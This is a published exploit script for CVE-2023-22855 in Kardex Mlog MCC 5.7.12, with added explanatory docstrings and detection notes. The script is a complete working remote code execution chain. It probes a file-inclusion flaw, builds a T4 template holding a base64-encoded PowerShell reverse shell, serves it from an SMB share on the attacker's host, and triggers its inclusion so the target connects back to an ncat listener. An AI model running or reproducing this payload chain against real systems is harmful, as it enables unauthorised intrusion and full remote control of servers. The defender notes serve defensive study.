
Kardex Mlog MCC 5.7.12 Remote Code Execution

2023-04-0500:00:00
Patrick Hener
packetstormsecurity.com
kardex mlog mcc
remote code execution
cve-2023-22855
windows server 2016
smb server
rev shell


#!/usr/bin/env python3
  
# Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)  
# Date: 12/13/2022  
# Exploit Author: Patrick Hener  
# Vendor Homepage: https://www.kardex.com/en/mlog-control-center  
# Version: 5.7.12+0-a203c2a213-master  
# Tested on: Windows Server 2016  
# CVE : CVE-2023-22855  
# Writeup: https://hesec.de/posts/CVE-2023-22855  
#  
# You will need to run a netcat listener beforehand: ncat -lnvp <port>  
#  
import requests, argparse, base64, os, threading  
from impacket import smbserver  
  
def probe(target: str) -> bool:
    r"""Check whether *target* returns local files for a backslash-rooted URL path.

    Requests ``{target}/\Windows\win.ini`` and treats the presence of the
    substring ``fonts`` in the body (presumably the ``[fonts]`` section of a
    stock win.ini) as proof that the server returned the file's contents.

    Args:
        target: Base URL of the MCC web application (scheme and host).

    Returns:
        True when the file-inclusion check succeeds, False otherwise.

    Defender notes: a request path containing ``\Windows\win.ini`` (or any
    backslash-rooted absolute path) is a reliable access-log signature for
    this probe. No timeout is set on the request, so the call blocks for as
    long as the server holds the connection open.
    """
    headers = {
        "Accept-Encoding": "deflate"
    }
    # Two backslashes in the Python literal are one backslash on the wire.
    res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers)
    if "fonts" in res.text:
        return True
    else:
        return False
  
def gen_payload(lhost: str, lport: str) -> str:
    """Return the T4 template text that, when rendered, starts a PowerShell reverse shell.

    Args:
        lhost: Address the reverse shell connects back to.
        lport: Port on *lhost*; kept as the string argparse produced, since it
            is only interpolated into the PowerShell text.

    Returns:
        The template source that ``main`` writes to ``exploit.t4``.

    Defender notes: the observable artifacts on the affected host are a
    ``cmd.exe /c powershell -e <base64>`` child process started with the
    ``runas`` verb and an outbound TCP connection to ``lhost:lport``.
    Command-line logging of encoded PowerShell (decode the base64 as
    UTF-16LE) exposes the reverse shell directly.
    """
    # PowerShell TCP reverse shell: connect, read a line, run it with iex,
    # send the output back with a "PS <cwd>> " prompt, repeat until the
    # stream closes.
    rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'
    # powershell -e expects the command base64-encoded from UTF-16LE.
    rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE'))
    # T4 text template with a C# control block: whatever renders the template
    # executes the block, which launches cmd.exe with the encoded one-liner.
    # NOTE(review): that the MCC server renders an included .t4 file is stated
    # by the writeup, not visible in this script.
    payload = f"""<#@ template language="C#" #>
<#@ Import Namespace="System" #>
<#@ Import Namespace="System.Diagnostics" #>
<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e {rev_shell_blob_b64.decode()}";
proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#>"""

    return payload
  
def start_smb_server(lhost: str) -> None:
    """Serve the current working directory as SMB share ``SHARE`` on *lhost*:445.

    Blocks inside ``server.start()`` for the lifetime of the server, which is
    why ``main`` runs it on a thread. Because the share root is ``os.getcwd()``,
    the ``exploit.t4`` that ``main`` writes next to the script is what gets
    served.

    Defender notes: delivery relies on the application server opening an
    outbound SMB connection (TCP 445) to an arbitrary host. Blocking outbound
    SMB at the network edge removes this delivery path independently of the
    web-layer flaw; an unexpected outbound 445 connection from the MCC host is
    itself a strong indicator.
    """
    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
    # Third argument is the share comment, not a credential.
    server.addShare("SHARE", os.getcwd(), '')
    server.setSMB2Support(True)
    # Empty NTLM challenge — presumably so any client can connect; confirm
    # against impacket's SimpleSMBServer if it matters.
    server.setSMBChallenge('')
    server.start()
  
def trigger_vulnerability(target: str, lhost: str) -> None:
    r"""Request ``\\lhost\SHARE\exploit.t4`` through the same path handling ``probe`` checked.

    Args:
        target: Base URL of the MCC web application.
        lhost: Host running the SMB share from ``start_smb_server``.

    The HTTP response is discarded; success is only observed out of band by
    the reverse shell connecting back. No timeout is set on the request.

    Defender notes: a UNC path (``\\host\share\file``) inside a request URL
    is the decisive indicator for this technique. Such a request in the MCC
    access log, followed by an outbound SMB connection from the server to
    that host, should be handled as an exploitation attempt.
    """
    headers = {
        "Accept-Encoding": "deflate"
    }

    # Four backslashes in the literal become the two that open a UNC path.
    requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers)
  
def main() -> None:
    """Command-line entry point: probe, stage the template, serve it over SMB, trigger.

    Side effects: writes ``exploit.t4`` into the current working directory
    (the directory ``start_smb_server`` shares), binds TCP 445 on ``--lhost``,
    blocks on stdin until Enter is pressed, and ends the process with
    ``os._exit(1)``.
    """
    # Well, args
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='Target host url', required=True)
    parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True)
    # Kept as a string; it is only ever interpolated into text.
    parser.add_argument('-p', '--lport', help='Attacker listening port', required=True)
    args = parser.parse_args()

    # Probe if target is vulnerable
    print("[*] Probing target")
    if probe(args.target):
        print("[+] Target is alive and File Inclusion working")
    else:
        print("[-] Target is not alive or File Inclusion not working")
        # site-provided exit(); raises SystemExit with status -1
        exit(-1)

    # Write payload to file
    print("[*] Writing 'exploit.t4' payload to be included later on")
    with open("exploit.t4", 'w') as template:
        template.write(gen_payload(args.lhost, args.lport))

    # Redundant: the with block above already closed the file.
    template.close()

    # Start smb server in background
    print("[*] Starting SMB Server in the background")
    # Non-daemon thread: server.start() never returns, so only os._exit
    # below can end the process.
    smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,))
    smb_server_thread.start()

    # Rev Shell reminder
    print("[!] At this point you should have spawned a rev shell listener")
    print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'")
    print("[?] Are you ready to trigger the vuln? Then press enter!")
    input() # Wait for input then continue

    # Trigger vulnerability
    print("[*] Now triggering the vulnerability")
    trigger_vulnerability(args.target, args.lhost)

    # Exit
    print("[+] Enjoy your shell. Bye!")
    # Hard exit that skips interpreter shutdown (and the blocked SMB thread);
    # note the status is 1 even on the success path.
    os._exit(1)
  
  
  
# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
  
  